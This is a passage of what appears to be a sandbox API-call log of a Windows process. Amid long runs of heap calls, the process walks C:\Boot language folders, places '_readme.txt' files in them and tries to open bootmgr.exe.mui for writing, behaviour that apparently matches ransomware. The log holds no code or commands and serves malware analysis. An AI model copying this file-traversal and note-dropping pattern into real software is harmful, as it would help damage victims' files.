[0093.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.123] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0093.123] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.123] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.123] PathFindFileNameW (pszPath="") returned="" [0093.123] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.124] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.125] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.125] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.125] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.125] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.125] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.125] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0093.125] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.125] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.125] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0093.125] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.125] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.125] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c75c0 [0093.126] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.126] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.126] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.126] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.126] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3538 [0093.126] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.126] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned=".mui" [0093.126] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.126] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3538 | out: hHeap=0x680000) returned 1 [0093.126] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa33beb00, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.126] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.126] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3538 [0093.126] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.126] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned=".txt" [0093.126] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3538 | out: hHeap=0x680000) returned 1 [0093.126] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa33beb00, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.126] FindClose (in: hFindFile=0x31c75c0 | out: hFindFile=0x31c75c0) returned 1 [0093.126] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.127] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.127] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.127] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.127] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.127] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.127] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.127] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.127] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.127] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.127] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.127] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.127] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.127] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.127] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.127] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.127] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.127] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.127] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.127] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.127] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.128] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.128] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.128] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.128] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.128] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.128] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.128] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.128] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.128] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.129] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0093.129] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.129] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.129] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.129] PathFindFileNameW (pszPath="") returned="" [0093.129] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.129] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.130] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.130] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0093.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.130] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.130] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0093.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.130] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.130] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0093.130] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.131] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c75c0 [0093.131] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.131] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.131] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3580 [0093.131] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.131] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned=".mui" [0093.131] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.131] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3580 | out: hHeap=0x680000) returned 1 [0093.131] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa33beb00, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3580 